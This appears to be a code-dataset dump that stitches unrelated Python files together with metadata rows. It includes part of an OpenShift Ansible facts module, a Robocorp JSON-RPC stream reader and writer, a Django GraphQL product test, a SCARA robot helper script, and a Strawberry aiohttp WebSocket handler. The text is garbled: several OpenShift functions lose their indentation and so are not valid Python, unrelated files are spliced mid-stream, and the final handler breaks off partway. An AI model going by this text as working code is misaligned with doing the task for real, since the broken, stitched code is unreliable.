            # NOTE: This is a workaround for a dnf output racecondition that can occur in
            # some situations. See https://bugzilla.redhat.com/show_bug.cgi?id=918184
            if self.system_facts['ansible_pkg_mgr'] == 'dnf':
                rpm_rebuilddb()

            version_info = get_docker_version_info()
            if version_info is not None:
                docker['api_version'] = version_info['api_version']
                docker['version'] = version_info['version']
                docker['gte_1_10'] = LooseVersion(version_info['version']) >= LooseVersion('1.10')

            hosted_registry_insecure = get_hosted_registry_insecure()
            if hosted_registry_insecure is not None:
                docker['hosted_registry_insecure'] = hosted_registry_insecure

            docker['service_name'] = 'docker'
            defaults['docker'] = docker

        if 'cloudprovider' in roles:
            defaults['cloudprovider'] = dict(kind=None)

        # The hosted role also carries the default storage layouts for the
        # hosted components (etcd, registry) plus logging and metrics.
        if 'hosted' in roles or self.role == 'hosted':
            defaults['hosted'] = dict(
                etcd=dict(
                    storage=dict(
                        kind=None,
                        volume=dict(
                            name='etcd',
                            size='1Gi'
                        ),
                        nfs=dict(
                            directory='/exports',
                            options='*(rw,root_squash)'
                        ),
                        host=None,
                        access=dict(
                            modes=['ReadWriteOnce']
                        ),
                        create_pv=True,
                        create_pvc=False
                    )
                ),
                registry=dict(
                    storage=dict(
                        kind=None,
                        volume=dict(
                            name='registry',
                            size='5Gi'
                        ),
                        nfs=dict(
                            directory='/exports',
                            options='*(rw,root_squash)'),
                        glusterfs=dict(
                            endpoints='glusterfs-registry-endpoints',
                            path='glusterfs-registry-volume',
                            readOnly=False,
                            swap=False,
                            swapcopy=True),
                        host=None,
                        access=dict(
                            modes=['ReadWriteMany']
                        ),
                        create_pv=True,
                        create_pvc=True
                    )
                ),
                router=dict()
            )

            defaults['logging'] = dict(
                storage=dict(
                    kind=None,
                    volume=dict(
                        name='logging-es',
                        size='10Gi'
                    ),
                    nfs=dict(
                        directory='/exports',
                        options='*(rw,root_squash)'
                    ),
                    host=None,
                    access=dict(
                        modes=['ReadWriteOnce']
                    ),
                    create_pv=True,
                    create_pvc=False
                )
            )

            defaults['loggingops'] = dict(
                storage=dict(
                    kind=None,
                    volume=dict(
                        name='logging-es-ops',
                        size='10Gi'
                    ),
                    nfs=dict(
                        directory='/exports',
                        options='*(rw,root_squash)'
                    ),
                    host=None,
                    access=dict(
                        modes=['ReadWriteOnce']
                    ),
                    create_pv=True,
                    create_pvc=False
                )
            )

            defaults['metrics'] = dict(
                deploy=False,
                duration=7,
                resolution='10s',
                storage=dict(
                    kind=None,
                    volume=dict(
                        name='metrics',
                        size='10Gi'
                    ),
                    nfs=dict(
                        directory='/exports',
                        options='*(rw,root_squash)'
                    ),
                    host=None,
                    access=dict(
                        modes=['ReadWriteOnce']
                    ),
                    create_pv=True,
                    create_pvc=False
                )
            )

        return defaults
def guess_host_provider(self):
# TODO: cloud provider facts should probably be submitted upstream
product_name = self.system_facts['ansible_product_name']
product_version = self.system_facts['ansible_product_version']
virt_type = self.system_facts['ansible_virtualization_type']
virt_role = self.system_facts['ansible_virtualization_role']
bios_vendor = self.system_facts['ansible_system_vendor']
provider = None
metadata = None
if bios_vendor == 'Google':
provider = 'gce'
metadata_url = ('http://metadata.google.internal/'
'computeMetadata/v1/?recursive=true')
headers = {'Metadata-Flavor': 'Google'}
metadata = get_provider_metadata(metadata_url, True, headers,
True)
# Filter sshKeys and serviceAccounts from gce metadata
if metadata:
metadata['project']['attributes'].pop('sshKeys', None)
metadata['instance'].pop('serviceAccounts', None)
elif virt_type == 'xen' and virt_role == 'guest' and re.match(r'.*\.amazon$', product_version):
provider = 'aws'
metadata_url = 'http://169.254.169.254/latest/meta-data/'
metadata = get_provider_metadata(metadata_url)
elif re.search(r'OpenStack', product_name):
provider = 'openstack'
metadata_url = ('http://169.254.169.254/openstack/latest/'
'meta_data.json')
metadata = get_provider_metadata(metadata_url, True, None,
True)
if metadata:
ec2_compat_url = 'http://169.254.169.254/latest/meta-data/'
metadata['ec2_compat'] = get_provider_metadata(
ec2_compat_url
)
# disable pylint maybe-no-member because overloaded use of
# the module name causes pylint to not detect that results
# is an array or hash
# pylint: disable=maybe-no-member
# Filter public_keys and random_seed from openstack metadata
metadata.pop('public_keys', None)
metadata.pop('random_seed', None)
if not metadata['ec2_compat']:
metadata = None
return dict(name=provider, metadata=metadata)
def init_provider_facts(self):
provider_info = self.guess_host_provider()
provider_facts = normalize_provider_facts(
provider_info.get('name'),
provider_info.get('metadata')
)
return provider_facts
@staticmethod
def split_openshift_env_fact_keys(openshift_env_fact, openshift_env_structures):
# By default, we'll split an openshift_env fact by underscores.
fact_keys = openshift_env_fact.split('_')
matching_structure = None
if openshift_env_structures is not None:
for structure in openshift_env_structures:
if re.match(structure, openshift_env_fact):
matching_structure = structure
if matching_structure is None:
return fact_keys
final_keys = []
structure_keys = matching_structure.split('.')
for structure_key in structure_keys:
# Matched current key. Add to final keys.
if structure_key == fact_keys[structure_keys.index(structure_key)]:
final_keys.append(structure_key)
# Wildcard means we will be taking everything from here to the end of the fact.
elif structure_key == '*':
final_keys.append('_'.join(fact_keys[structure_keys.index(structure_key):]))
# Shouldn't have gotten here, return the fact keys.
else:
return fact_keys
return final_keys
    def init_local_facts(self, facts=None,
                         additive_facts_to_overwrite=None,
                         openshift_env=None,
                         openshift_env_structures=None,
                         protected_facts_to_overwrite=None):
        """Initialize (and persist) the local facts for this host.

        Merges the facts cached in the local facts file with the facts
        supplied for this role and any openshift_env inventory variables,
        normalizes the docker registry / log_options values, and writes the
        result back to the facts file when it changed (unless running in
        check mode).

        :returns: the new local facts dict
        """
        changed = False

        facts_to_set = dict()

        if facts is not None:
            facts_to_set[self.role] = facts

        # Expand each openshift_env variable (e.g. openshift_node_labels)
        # into the nested facts structure for this role.
        if openshift_env != {} and openshift_env is not None:
            for fact, value in iteritems(openshift_env):
                oo_env_facts = dict()
                current_level = oo_env_facts
                # [1:] drops the leading 'openshift' component.
                keys = self.split_openshift_env_fact_keys(fact, openshift_env_structures)[1:]

                # Only facts addressed to this role are applied.
                if len(keys) > 0 and keys[0] != self.role:
                    continue

                for key in keys:
                    if key == keys[-1]:
                        current_level[key] = value
                    elif key not in current_level:
                        current_level[key] = dict()
                    current_level = current_level[key]

                facts_to_set = merge_facts(orig=facts_to_set,
                                           new=oo_env_facts,
                                           additive_facts_to_overwrite=[],
                                           protected_facts_to_overwrite=[])

        local_facts = get_local_facts_from_file(self.filename)

        migrated_facts = migrate_local_facts(local_facts)

        new_local_facts = merge_facts(migrated_facts,
                                      facts_to_set,
                                      additive_facts_to_overwrite,
                                      protected_facts_to_overwrite)

        if 'docker' in new_local_facts:
            # Convert legacy comma-separated registry strings into
            # de-duplicated lists (order preserved, empties dropped).
            for cat in ['additional', 'blocked', 'insecure']:
                key = '{0}_registries'.format(cat)
                if key in new_local_facts['docker']:
                    val = new_local_facts['docker'][key]
                    if isinstance(val, string_types):
                        val = [x.strip() for x in val.split(',')]
                    seen = set()
                    new_local_facts['docker'][key] = list()
                    for registry in val:
                        if registry not in seen and registry != '':
                            seen.add(registry)
                            new_local_facts['docker'][key].append(registry)

            # log_options may also arrive as a comma-separated string.
            if 'log_options' in new_local_facts['docker'] and \
                    isinstance(new_local_facts['docker']['log_options'], string_types):
                new_local_facts['docker']['log_options'] = new_local_facts['docker']['log_options'].split(',')

        new_local_facts = self.remove_empty_facts(new_local_facts)

        # Only validate and persist when the facts actually changed.
        if new_local_facts != local_facts:
            self.validate_local_facts(new_local_facts)
            changed = True
            if not module.check_mode:
                save_local_facts(self.filename, new_local_facts)

        self.changed = changed
        return new_local_facts
    def remove_empty_facts(self, facts=None):
        """Recursively drop facts whose value is empty.

        A value counts as empty when it is '', [''] or None.  Nested dicts
        are cleaned recursively; note that a dict which *becomes* empty is
        still kept (only non-dict values are removed).

        :param facts: dict of facts to clean (modified in place)
        :returns: the cleaned facts dict
        """
        facts_to_remove = []
        for fact, value in iteritems(facts):
            if isinstance(facts[fact], dict):
                facts[fact] = self.remove_empty_facts(facts[fact])
            else:
                if value == "" or value == [""] or value is None:
                    facts_to_remove.append(fact)
        # Deletion is deferred so the dict is not resized while iterating.
        for fact in facts_to_remove:
            del facts[fact]
        return facts
def validate_local_facts(self, facts=None):
invalid_facts = dict()
invalid_facts = self.validate_master_facts(facts, invalid_facts)
if invalid_facts:
msg = 'Invalid facts detected:\n'
for key in invalid_facts.keys():
msg += '{0}: {1}\n'.format(key, invalid_facts[key])
module.fail_json(msg=msg, changed=self.changed)
# with best effort reduction of error messages here.
# disabling errors for too-many-branches since we require checking
# many conditions.
# pylint: disable=line-too-long, too-many-branches
@staticmethod
def validate_master_facts(facts, invalid_facts):
if 'master' in facts:
# openshift.master.session_auth_secrets
if 'session_auth_secrets' in facts['master']:
session_auth_secrets = facts['master']['session_auth_secrets']
if not issubclass(type(session_auth_secrets), list):
invalid_facts['session_auth_secrets'] = 'Expects session_auth_secrets is a list.'
elif 'session_encryption_secrets' not in facts['master']:
invalid_facts['session_auth_secrets'] = ('openshift_master_session_encryption secrets must be set '
'if openshift_master_session_auth_secrets is provided.')
elif len(session_auth_secrets) != len(facts['master']['session_encryption_secrets']):
invalid_facts['session_auth_secrets'] = ('openshift_master_session_auth_secrets and '
'openshift_master_session_encryption_secrets must be '
'equal length.')
else:
for secret in session_auth_secrets:
if len(secret) < 32:
invalid_facts['session_auth_secrets'] = ('Invalid secret in session_auth_secrets. '
'Secrets must be at least 32 characters in length.')
# openshift.master.session_encryption_secrets
if 'session_encryption_secrets' in facts['master']:
session_encryption_secrets = facts['master']['session_encryption_secrets']
if not issubclass(type(session_encryption_secrets), list):
invalid_facts['session_encryption_secrets'] = 'Expects session_encryption_secrets is a list.'
elif 'session_auth_secrets' not in facts['master']:
invalid_facts['session_encryption_secrets'] = ('openshift_master_session_auth_secrets must be '
'set if openshift_master_session_encryption_secrets '
'is provided.')
else:
for secret in session_encryption_secrets:
if len(secret) not in [16, 24, 32]:
invalid_facts['session_encryption_secrets'] = ('Invalid secret in session_encryption_secrets. '
'Secrets must be 16, 24, or 32 characters in length.')
return invalid_facts
def main():
    """Ansible module entry point: generate and persist openshift facts."""
    # disabling pylint errors for global-variable-undefined and invalid-name
    # for 'global module' usage, since it is required to use ansible_facts
    # pylint: disable=global-variable-undefined, invalid-name
    global module
    module = AnsibleModule(  # noqa: F405
        argument_spec=dict(
            role=dict(default='common', required=False,
                      choices=OpenShiftFacts.known_roles),
            local_facts=dict(default=None, type='dict', required=False),
            additive_facts_to_overwrite=dict(default=[], type='list', required=False),
            openshift_env=dict(default={}, type='dict', required=False),
            openshift_env_structures=dict(default=[], type='list', required=False),
            protected_facts_to_overwrite=dict(default=[], type='list', required=False)
        ),
        supports_check_mode=True,
        add_file_common_args=True,
    )

    if not HAVE_DBUS:
        module.fail_json(msg="This module requires dbus python bindings")  # noqa: F405

    # Restrict fact gathering to the subsets OpenShiftFacts actually reads.
    module.params['gather_subset'] = ['hardware', 'network', 'virtual', 'facter']  # noqa: F405
    module.params['gather_timeout'] = 10  # noqa: F405
    module.params['filter'] = '*'  # noqa: F405

    role = module.params['role']  # noqa: F405
    local_facts = module.params['local_facts']  # noqa: F405
    additive_facts_to_overwrite = module.params['additive_facts_to_overwrite']  # noqa: F405
    openshift_env = module.params['openshift_env']  # noqa: F405
    openshift_env_structures = module.params['openshift_env_structures']  # noqa: F405
    protected_facts_to_overwrite = module.params['protected_facts_to_overwrite']  # noqa: F405

    fact_file = '/etc/ansible/facts.d/openshift.fact'

    openshift_facts = OpenShiftFacts(role,
                                     fact_file,
                                     local_facts,
                                     additive_facts_to_overwrite,
                                     openshift_env,
                                     openshift_env_structures,
                                     protected_facts_to_overwrite)

    # Apply any requested ownership/permission changes to the facts file.
    file_params = module.params.copy()  # noqa: F405
    file_params['path'] = fact_file
    file_args = module.load_file_common_arguments(file_params)  # noqa: F405
    changed = module.set_fs_attributes_if_different(file_args,  # noqa: F405
                                                    openshift_facts.changed)

    return module.exit_json(changed=changed,  # noqa: F405
                            ansible_facts=openshift_facts.facts)


if __name__ == '__main__':
    main()
| true | true |
1c2c91ef426018a08e97eb10508fb90a171c6c47 | 5,831 | py | Python | robocorp-python-ls-core/src/robocorp_ls_core/jsonrpc/streams.py | GLMeece/robotframework-lsp | dc9c807c4a192d252df1d05a1c5d16f8c1f24086 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | robocorp-python-ls-core/src/robocorp_ls_core/jsonrpc/streams.py | GLMeece/robotframework-lsp | dc9c807c4a192d252df1d05a1c5d16f8c1f24086 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | robocorp-python-ls-core/src/robocorp_ls_core/jsonrpc/streams.py | GLMeece/robotframework-lsp | dc9c807c4a192d252df1d05a1c5d16f8c1f24086 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Original work Copyright 2018 Palantir Technologies, Inc. (MIT)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from robocorp_ls_core.robotframework_log import get_logger
from typing import Optional
import json
from robocorp_ls_core.options import BaseOptions
log = get_logger(__name__)
def read(stream) -> Optional[str]:
    """
    Reads one message from the stream and returns the message (or None if EOF was reached).

    :param stream:
        The stream we should be reading from.

    :return str|NoneType:
        The message or None if the stream was closed.

    :raises RuntimeError:
        If a malformed header section is found: a bad header line, no
        headers at all, or a missing/non-numeric Content-Length header.
    """
    headers = {}
    while True:
        # Interpret the http protocol headers
        line = stream.readline()  # The trailing \r\n should be there.

        if not line:  # EOF
            return None
        line = line.strip().decode("ascii")

        if not line:  # Read just a new line without any contents
            break

        try:
            name, value = line.split(": ", 1)
        except ValueError:
            raise RuntimeError("Invalid header line: {}.".format(line))

        headers[name.strip()] = value.strip()

    if not headers:
        raise RuntimeError("Got message without headers.")

    try:
        content_length = int(headers["Content-Length"])
    except (KeyError, ValueError):
        # Without a numeric Content-Length we cannot know how many bytes to
        # read; fail with an error that names the actual problem instead of
        # surfacing a bare KeyError/ValueError.
        raise RuntimeError(
            "Got message without a valid Content-Length header: {}.".format(headers)
        )

    # Get the actual json
    body = _read_len(stream, content_length)
    return body.decode("utf-8")
def _read_len(stream, content_length) -> bytes:
buf = b""
if not content_length:
return buf
# Grab the body
while True:
data = stream.read(content_length - len(buf))
if not buf and len(data) == content_length:
# Common case
return data
buf += data
if len(buf) == content_length:
return buf
if len(buf) > content_length:
raise AssertionError(
"Expected to read message up to len == %s (already read: %s). Found:\n%s"
% (content_length, len(buf), buf.decode("utf-8", "replace"))
)
# len(buf) < content_length (just keep on going).
class JsonRpcStreamReader(object):
    """Reads Content-Length framed JSON-RPC messages from a file-like stream."""

    def __init__(self, rfile):
        # rfile: binary file-like object the framed messages are read from.
        self._rfile = rfile

    def close(self):
        self._rfile.close()

    def listen(self, message_consumer):
        """Blocking call to listen for messages on the rfile.

        Args:
            message_consumer (fn): function that is passed each message as it is read off the socket.
        """
        try:
            while not self._rfile.closed:
                data = read(self._rfile)
                if data is None:
                    # EOF: the peer closed the stream.
                    log.debug("Read: %s", data)
                    return
                try:
                    msg = json.loads(data)
                except:
                    # Deliberately broad: one bad payload must not end the
                    # listen loop.
                    log.exception("Failed to parse JSON message %s", data)
                    continue
                if isinstance(msg, dict):
                    if msg.get("command") not in BaseOptions.HIDE_COMMAND_MESSAGES:
                        log.debug("Read: %s", data)
                else:
                    log.debug("Read (non dict data): %s", data)
                try:
                    message_consumer(msg)
                except:
                    log.exception("Error processing JSON message %s", data)
                    continue
        except ConnectionResetError:
            pass  # Just ignore this one (connection was closed)
        except Exception:
            log.exception("Error in JsonRpcStreamReader.")
        finally:
            log.debug("Exited JsonRpcStreamReader.")
class JsonRpcStreamWriter(object):
    """Writes Content-Length framed JSON-RPC messages to a file-like stream."""

    def __init__(self, wfile, **json_dumps_args):
        # wfile: binary file-like object; json_dumps_args are forwarded to
        # json.dumps when serializing each message.
        assert wfile is not None
        self._wfile = wfile
        # Serializes concurrent writers so frames are never interleaved.
        self._wfile_lock = threading.Lock()
        self._json_dumps_args = json_dumps_args

    def close(self):
        log.debug("Will close writer")
        with self._wfile_lock:
            self._wfile.close()

    def write(self, message):
        """Write one message; returns True on success, False otherwise."""
        with self._wfile_lock:
            if self._wfile.closed:
                log.debug("Unable to write %s (file already closed).", (message,))
                return False
            try:
                if isinstance(message, dict):
                    if message.get("command") not in BaseOptions.HIDE_COMMAND_MESSAGES:
                        log.debug("Writing: %s", message)
                else:
                    log.debug("Writing (non dict message): %s", message)

                body = json.dumps(message, **self._json_dumps_args)

                # Content-Length counts utf-8 encoded bytes, not characters.
                as_bytes = body.encode("utf-8")
                stream = self._wfile
                content_len_as_str = "Content-Length: %s\r\n\r\n" % len(as_bytes)
                content_len_bytes = content_len_as_str.encode("ascii")
                stream.write(content_len_bytes)
                stream.write(as_bytes)
                stream.flush()
                return True
            except Exception:  # pylint: disable=broad-except
                log.exception(
                    "Failed to write message to output file %s - closed: %s",
                    message,
                    self._wfile.closed,
                )
                return False
| 34.099415 | 101 | 0.579832 |
import threading
from robocorp_ls_core.robotframework_log import get_logger
from typing import Optional
import json
from robocorp_ls_core.options import BaseOptions
log = get_logger(__name__)
def read(stream) -> Optional[str]:
    """Read one Content-Length framed message from *stream*.

    Returns the decoded message body, or None if the stream hit EOF before
    any header was read.  Raises RuntimeError on a malformed header line or
    a header section with no headers at all.
    """
    headers = {}
    while True:
        line = stream.readline()  # Includes the trailing \r\n, if present.
        if not line:  # EOF
            return None
        line = line.strip().decode("ascii")
        if not line:  # Blank line terminates the header section.
            break
        try:
            name, value = line.split(": ", 1)
        except ValueError:
            raise RuntimeError("Invalid header line: {}.".format(line))
        headers[name.strip()] = value.strip()
    if not headers:
        raise RuntimeError("Got message without headers.")
    # NOTE(review): a missing Content-Length surfaces as a bare KeyError
    # here -- a named RuntimeError would be clearer.
    content_length = int(headers["Content-Length"])
    body = _read_len(stream, content_length)
    return body.decode("utf-8")
def _read_len(stream, content_length) -> bytes:
    """Read exactly *content_length* bytes from *stream* and return them.

    Raises AssertionError if more bytes than expected accumulate.
    NOTE(review): if the stream hits EOF early, stream.read() returns b""
    forever and this loop never terminates -- confirm callers always
    terminate the loop at a higher level.
    """
    buf = b""
    if not content_length:
        return buf
    while True:
        data = stream.read(content_length - len(buf))
        if not buf and len(data) == content_length:
            # Fast path: whole body arrived in one read.
            return data
        buf += data
        if len(buf) == content_length:
            return buf
        if len(buf) > content_length:
            raise AssertionError(
                "Expected to read message up to len == %s (already read: %s). Found:\n%s"
                % (content_length, len(buf), buf.decode("utf-8", "replace"))
            )
class JsonRpcStreamReader(object):
    """Reads Content-Length framed JSON-RPC messages from a file-like stream."""

    def __init__(self, rfile):
        # rfile: binary file-like object the framed messages are read from.
        self._rfile = rfile

    def close(self):
        self._rfile.close()

    def listen(self, message_consumer):
        """Blocking loop: pass every decoded message to *message_consumer*."""
        try:
            while not self._rfile.closed:
                data = read(self._rfile)
                if data is None:
                    # EOF: the peer closed the stream.
                    log.debug("Read: %s", data)
                    return
                try:
                    msg = json.loads(data)
                except:
                    # Deliberately broad: one bad payload must not end the loop.
                    log.exception("Failed to parse JSON message %s", data)
                    continue
                if isinstance(msg, dict):
                    if msg.get("command") not in BaseOptions.HIDE_COMMAND_MESSAGES:
                        log.debug("Read: %s", data)
                else:
                    log.debug("Read (non dict data): %s", data)
                try:
                    message_consumer(msg)
                except:
                    log.exception("Error processing JSON message %s", data)
                    continue
        except ConnectionResetError:
            pass  # Connection was closed: treat as a normal shutdown.
        except Exception:
            log.exception("Error in JsonRpcStreamReader.")
        finally:
            log.debug("Exited JsonRpcStreamReader.")
class JsonRpcStreamWriter(object):
    """Writes Content-Length framed JSON-RPC messages to a file-like stream."""

    def __init__(self, wfile, **json_dumps_args):
        # wfile: binary file-like object; json_dumps_args are forwarded to
        # json.dumps when serializing each message.
        assert wfile is not None
        self._wfile = wfile
        # Serializes concurrent writers so frames are never interleaved.
        self._wfile_lock = threading.Lock()
        self._json_dumps_args = json_dumps_args

    def close(self):
        log.debug("Will close writer")
        with self._wfile_lock:
            self._wfile.close()

    def write(self, message):
        """Write one message; returns True on success, False otherwise."""
        with self._wfile_lock:
            if self._wfile.closed:
                log.debug("Unable to write %s (file already closed).", (message,))
                return False
            try:
                if isinstance(message, dict):
                    if message.get("command") not in BaseOptions.HIDE_COMMAND_MESSAGES:
                        log.debug("Writing: %s", message)
                else:
                    log.debug("Writing (non dict message): %s", message)
                body = json.dumps(message, **self._json_dumps_args)
                # Content-Length counts utf-8 encoded bytes, not characters.
                as_bytes = body.encode("utf-8")
                stream = self._wfile
                content_len_as_str = "Content-Length: %s\r\n\r\n" % len(as_bytes)
                content_len_bytes = content_len_as_str.encode("ascii")
                stream.write(content_len_bytes)
                stream.write(as_bytes)
                stream.flush()
                return True
            except Exception:
                log.exception(
                    "Failed to write message to output file %s - closed: %s",
                    message,
                    self._wfile.closed,
                )
                return False
| true | true |
1c2c937a1e1b887eac89fb032b256333827e1c88 | 709 | py | Python | online_shop/app/tests/test_product_schema.py | styam/django_graphene | 7ae997bd7e3d8ceae1820f8c9ef69ba16d0c53ee | [
"MIT"
] | 2 | 2021-03-24T10:55:54.000Z | 2021-04-05T12:36:56.000Z | online_shop/app/tests/test_product_schema.py | styam/django_graphene | 7ae997bd7e3d8ceae1820f8c9ef69ba16d0c53ee | [
"MIT"
] | null | null | null | online_shop/app/tests/test_product_schema.py | styam/django_graphene | 7ae997bd7e3d8ceae1820f8c9ef69ba16d0c53ee | [
"MIT"
] | null | null | null | from django.test import TestCase
import pytest
from graphene.test import Client
from mixer.backend.django import mixer
from app.models import Product
from app.tests.schema_format import (product_query_list, )
from online_shop.schema import schema
@pytest.mark.django_db
class TestProduct(TestCase):
    """GraphQL schema tests for the Product type."""

    def setUp(self):
        # Fresh GraphQL client plus one pre-existing product per test.
        self.client = Client(schema)
        self.product = mixer.blend(Product)

    # ======================= Test all products =======================
    def test_product_list(self):
        """allProducts should return the products in the database."""
        # A stray breakpoint() call was removed here: it suspends the
        # interpreter and hangs any non-interactive test run.
        mixer.blend(Product)
        response = self.client.execute(product_query_list)
        products = response.get("data").get("allProducts")
        assert len(products)
| 28.36 | 72 | 0.675599 | from django.test import TestCase
import pytest
from graphene.test import Client
from mixer.backend.django import mixer
from app.models import Product
from app.tests.schema_format import (product_query_list, )
from online_shop.schema import schema
@pytest.mark.django_db
class TestProduct(TestCase):
    """GraphQL schema tests for the Product type."""

    def setUp(self):
        # Fresh GraphQL client plus one pre-existing product per test.
        self.client = Client(schema)
        self.product = mixer.blend(Product)

    def test_product_list(self):
        """allProducts should return the products in the database."""
        # A stray breakpoint() call was removed here: it suspends the
        # interpreter and hangs any non-interactive test run.
        mixer.blend(Product)
        response = self.client.execute(product_query_list)
        products = response.get("data").get("allProducts")
        assert len(products)
| true | true |
1c2c9484e694e8a751c4dd47aed3cf1de2b9f7ef | 1,065 | py | Python | 2020-09-01-1054-gma_my_scara_funcs.py | gmaubach/OOP-with-Python | 9b059e911d55d616e756324564f1f2cc524aa53d | [
"MIT"
] | null | null | null | 2020-09-01-1054-gma_my_scara_funcs.py | gmaubach/OOP-with-Python | 9b059e911d55d616e756324564f1f2cc524aa53d | [
"MIT"
] | null | null | null | 2020-09-01-1054-gma_my_scara_funcs.py | gmaubach/OOP-with-Python | 9b059e911d55d616e756324564f1f2cc524aa53d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 31 11:14:43 2020
@author: Georg Maubach
"""
# As of Python 3.8, DLL directories must be explicitly marked as trusted.
# Therefore, on Python 3.8.x and later, uncomment the two statements
# below and set the path to the project directory correctly.
import os
os.add_dll_directory("D:\Selfcoding\WillmsBis040920\scara64anaconda")
# The following line is for Visual Studio Code
os.environ['QT_PLUGIN_PATH'] = "D:\Selfcoding\WillmsBis040920\scara64anaconda"
import ctypes
Scara = ctypes.cdll.scara
def gehe2():
    """Move the SCARA robot forward two steps."""
    # Dropped the C-style trailing semicolons (unidiomatic in Python).
    Scara.gehe()
    Scara.gehe()
def gehe3():
    """Move the SCARA robot forward three steps.

    Reuses gehe2() instead of duplicating three individual calls:
    better to avoid code duplication and build on what already exists.
    """
    gehe2()
    Scara.gehe()
def dreheRechts():
    """Turn the SCARA robot to the right.

    Implemented as three left turns (the robot only exposes dreheLinks).
    """
    # '_' because the loop variable is unused.
    for _ in range(3):
        Scara.dreheLinks()
def dreheUm():
    """Turn the SCARA robot around via two left turns."""
    for _ in range(2):
        Scara.dreheLinks()
def geheBisAbgrund():
    """Walk forward until the robot detects an abyss directly ahead."""
    # 'not x' instead of 'x == False' (PEP 8: never compare to False with ==).
    while not Scara.istVorneAbgrund():
        Scara.gehe()
# EOF .
| 22.659574 | 79 | 0.646009 |
import os
os.add_dll_directory("D:\Selfcoding\WillmsBis040920\scara64anaconda")
os.environ['QT_PLUGIN_PATH'] = "D:\Selfcoding\WillmsBis040920\scara64anaconda"
import ctypes
Scara = ctypes.cdll.scara
def gehe2():
    """Move the SCARA robot forward two steps."""
    # Dropped the C-style trailing semicolons (unidiomatic in Python).
    Scara.gehe()
    Scara.gehe()
def gehe3():
    """Move the SCARA robot forward three steps (reusing gehe2)."""
    gehe2()
    Scara.gehe()
def dreheRechts():
    """Turn the SCARA robot to the right (three left turns)."""
    # '_' because the loop variable is unused.
    for _ in range(3):
        Scara.dreheLinks()
def dreheUm():
    """Turn the SCARA robot around via two left turns."""
    for _ in range(2):
        Scara.dreheLinks()
def geheBisAbgrund():
while(Scara.istVorneAbgrund() == False):
Scara.gehe();
| true | true |
1c2c95e73bc880ae001b0144521b1da015427cdf | 1,950 | py | Python | strawberry/aiohttp/handlers/graphql_transport_ws_handler.py | TheVinhLuong102/Strawberry | 3c442dc19d17bc55c4e26de1db7a9eedc0a228f5 | [
"MIT"
] | 2,062 | 2019-04-07T17:47:30.000Z | 2022-03-31T01:54:16.000Z | strawberry/aiohttp/handlers/graphql_transport_ws_handler.py | TheVinhLuong102/Strawberry | 3c442dc19d17bc55c4e26de1db7a9eedc0a228f5 | [
"MIT"
] | 1,582 | 2019-04-07T18:31:33.000Z | 2022-03-31T18:32:13.000Z | strawberry/aiohttp/handlers/graphql_transport_ws_handler.py | TheVinhLuong102/Strawberry | 3c442dc19d17bc55c4e26de1db7a9eedc0a228f5 | [
"MIT"
] | 303 | 2019-04-13T08:44:40.000Z | 2022-03-29T09:54:41.000Z | from datetime import timedelta
from typing import Any
from aiohttp import http, web
from strawberry.schema import BaseSchema
from strawberry.subscriptions import GRAPHQL_TRANSPORT_WS_PROTOCOL
from strawberry.subscriptions.protocols.graphql_transport_ws.handlers import (
BaseGraphQLTransportWSHandler,
)
class GraphQLTransportWSHandler(BaseGraphQLTransportWSHandler):
    """aiohttp handler for the graphql-transport-ws WebSocket subprotocol.

    Bridges an aiohttp ``web.Request`` to the transport-agnostic
    ``BaseGraphQLTransportWSHandler`` by supplying context/root-value
    factories and send/close primitives over a WebSocket response.
    """
    def __init__(
        self,
        schema: BaseSchema,
        debug: bool,
        connection_init_wait_timeout: timedelta,
        get_context,
        get_root_value,
        request: web.Request,
    ):
        super().__init__(schema, debug, connection_init_wait_timeout)
        self._get_context = get_context
        self._get_root_value = get_root_value
        self._request = request
        # Advertise only the graphql-transport-ws subprotocol to clients.
        self._ws = web.WebSocketResponse(protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL])
    async def get_context(self) -> Any:
        """Build the per-connection execution context via the injected factory."""
        return await self._get_context(request=self._request, response=self._ws)
    async def get_root_value(self) -> Any:
        """Build the root value for execution via the injected factory."""
        return await self._get_root_value(request=self._request)
    async def send_json(self, data: dict) -> None:
        """Serialize ``data`` as JSON and send it over the WebSocket."""
        await self._ws.send_json(data)
    async def close(self, code: int, reason: str) -> None:
        """Close the WebSocket with the given close code and reason text."""
        await self._ws.close(code=code, message=reason.encode())
    async def handle_request(self) -> web.StreamResponse:
        """Run the WebSocket handshake and message loop for one connection.

        Non-text frames are rejected via handle_invalid_message; on exit
        every live subscription operation is cleaned up before returning.
        """
        await self._ws.prepare(self._request)
        try:
            async for ws_message in self._ws:  # type: http.WSMessage
                if ws_message.type == http.WSMsgType.TEXT:
                    await self.handle_message(ws_message.json())
                else:
                    error_message = "WebSocket message type must be text"
                    await self.handle_invalid_message(error_message)
        finally:
            # Always tear down outstanding subscriptions, even if the
            # message loop exited with an error.
            for operation_id in list(self.subscriptions.keys()):
                await self.cleanup_operation(operation_id)
        return self._ws
| 35.454545 | 83 | 0.680513 | from datetime import timedelta
from typing import Any
from aiohttp import http, web
from strawberry.schema import BaseSchema
from strawberry.subscriptions import GRAPHQL_TRANSPORT_WS_PROTOCOL
from strawberry.subscriptions.protocols.graphql_transport_ws.handlers import (
BaseGraphQLTransportWSHandler,
)
class GraphQLTransportWSHandler(BaseGraphQLTransportWSHandler):
def __init__(
self,
schema: BaseSchema,
debug: bool,
connection_init_wait_timeout: timedelta,
get_context,
get_root_value,
request: web.Request,
):
super().__init__(schema, debug, connection_init_wait_timeout)
self._get_context = get_context
self._get_root_value = get_root_value
self._request = request
self._ws = web.WebSocketResponse(protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL])
async def get_context(self) -> Any:
return await self._get_context(request=self._request, response=self._ws)
async def get_root_value(self) -> Any:
return await self._get_root_value(request=self._request)
